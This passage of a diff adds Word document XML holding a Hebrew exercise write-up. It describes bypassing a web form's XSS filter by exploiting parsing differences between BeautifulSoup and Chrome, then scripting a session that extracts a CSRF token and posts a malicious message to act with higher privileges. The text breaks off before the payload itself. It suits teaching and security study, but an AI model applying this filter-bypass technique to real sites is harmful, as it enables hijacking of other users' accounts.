+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>b&gt;Hello&lt;/b</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>לאחר שליחת ההודעה, הטקסט הוצג באתר כשהוא מודגש. מכך ניתן היה להסיק שהאתר אינו מציג את תוכן ההודעה כטקסט רגיל, אלא מפרש אותו כ־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">בשלב הבא </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>בדקנו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> האם ניתן להפעיל </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ישירות באמצעות תגיות ואירועים נפוצים. ניסיונות אלו נחסמו על ידי מנגנון הסינון של האתר, אשר זיהה תגיות מסוימות ומאפיינים מסוכנים.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">לאחר מכן נעשה שימוש ברמז שניתן בתרגיל, לפיו קיים הבדל בין האופן שבו </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>BeautifulSoup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מפרש </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> לבין האופן שבו דפדפנים מבוססי </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Chrome</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מפרשים </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">. בפרט, דפדפנים נוטים להיות סלחניים יותר כלפי </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שאינו תקין לחלוטין ("</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>שבור</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>"), בעוד ש־</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>BeautifulSoup</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> עשוי לנתח אותו בצורה שונה.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">באמצעות יצירת </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>HTML</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> שאינו תואם בדיוק למבנה הצפוי על ידי מנגנון הסינון, אך עדיין מפורש בצורה תקינה על ידי </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Chrome</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">, ניתן היה לעקוף את מנגנון ההגנה ולהגיע למצב שבו קוד </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> מבוצע בדפדפן.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">לאחר שאומת כי ניתן להריץ קוד </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>, היה ניתן לנצל את החולשה לצורך ביצוע פעולות בהרשאות משתמש בעל הרשאות גבוהות יותר.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> בשלב זה התחלנו לכתוב את השרת:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">בתחילת הריצה השרת יוצר </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>requests.Sessio</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>כדי לשמור</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cookies </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>בין הבקשות. לאחר מכן הוא שולח בקשת</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> GET </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>לעמוד הראשי של האתר ומחלץ מתוך ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">HTML </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>את ערך ה־</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>csrf_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>הטוקן נדרש משום שהאתר בודק שכל שליחת הודעה נעשית עם טוקן תקף השייך לאותו</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> session</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>לאחר חילוץ הטוקן, השרת שולח בקשת</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> POST </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve">לנתיב </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">/request </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>בדומה לשליחת טופס רגילה מהדפדפן. הבקשה כוללת את שדות הטופס: שם, אימייל, נושא, מספר טלפון, הודעה ו־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>csrf_token</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t xml:space="preserve"> כאשר </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>בשדה ההודעה מוזן תוכן</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> HTML </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>שמנצל את חולשת ה־</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-IL"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">XSS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>באתר</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="minorBidi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorBidi" w:hint="cs"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:rtl/>
+        </w:rPr>
+        <w:t>ההודעה שנשלחת היא:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi w:val="0"/>
